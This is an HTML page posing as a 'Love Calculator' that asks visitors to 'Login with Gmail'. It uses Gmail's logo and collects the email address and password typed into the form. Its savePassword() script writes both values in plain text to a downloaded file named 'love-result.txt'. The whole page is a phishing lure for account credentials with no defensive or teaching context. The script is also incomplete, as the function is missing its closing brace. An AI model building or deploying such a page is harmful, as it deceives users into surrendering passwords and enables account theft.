<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://kit.fontawesome.com/d3fd9d5f94.js" crossorigin="anonymous"></script>
    <style>
        body {background: linear-gradient(106deg, rgba(34,51,195,1) 0%, rgba(253,45,45,1) 100%); height: 100%; }
        form {border: 3px solid #f1f1f1;}

        input[type=text], input[type=password] {
            width: 100%;
            padding: 12px 20px;
            margin: 8px 0;
            display: inline-block;
            border: 1px solid #ccc;
            box-sizing: border-box;
        }
        label{
            font-family: "Open Sans";
            font-weight: 200;
        }
        img{
            width: 22px;
            height: 18px;
        }

        button {
            background-color: #4CAF50;
            position: relative;
            right: -50%;
            margin-top: 15px;
            width: 120px;
            height: 40px;
            color: white;
            font-size: x-large;
            border: none;
            cursor: pointer;
            text-align: center;
            z-index: 5;
        transform: translateX(-50%);}

        button:hover {
            opacity: 0.8;
        }

        .container {
            padding: 16px;
            background-color: white;
            width: 90%;
            position: relative;
            right: -50%;
            transform: translateX(-50%);
            height: 650px;
            z-index: 1;

        }
        h1{
            font-family: Dubai;
            color: red;
            text-align: center;"

        }
        h2{
            font-family: monospace;
            text-align: center;
        }

        span.psw {
            float: right;
            padding-top: 16px;
        }

        /* Change styles for span and cancel button on extra small screens */
        @media screen and (max-width: 300px) {
            span.psw {
                display: block;
                float: none;
            }
        }
    </style>
</head>
<body>

<div class="container">

<h1 >Love Calculator</h1>

<h2 >Login with <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/4/45/New_Logo_Gmail.svg/256px-New_Logo_Gmail.svg.png"></h2>

        <label for="uname">Your Gmail account</label>
        <input type="text" placeholder="Enter email" id="username" name="uname" required>

        <label for="psw">Password</label>
        <input type="password" placeholder="Enter password" id="password" name="psw" required>

        <button onclick="savePassword()" type="submit">Login</button>
    </div>



<script>


</script>


<script type="text/javascript">

    function savePassword() {
        const email = document.getElementById('username');
        const pwd = document.getElementById('password');

        // This variable stores all the data.
        let data =
            '\r Email: ' + email.value + ' \r\n ' +
            'Password: ' + pwd.value + ' \r\n ' ;

        // Convert the text to BLOB.
        const textToBLOB = new Blob([data], { type: 'text/plain' });
        const sFileName = 'love-result.txt';	   // The file to save the data.

        let newLink = document.createElement("a");
        newLink.download = sFileName;

        if (window.webkitURL != null) {
            newLink.href = window.webkitURL.createObjectURL(textToBLOB);
        }
        else {
            newLink.href = window.URL.createObjectURL(textToBLOB);
            newLink.style.display = "none";
            document.body.appendChild(newLink);
        }

        newLink.click();


</script>

</body>
</html>

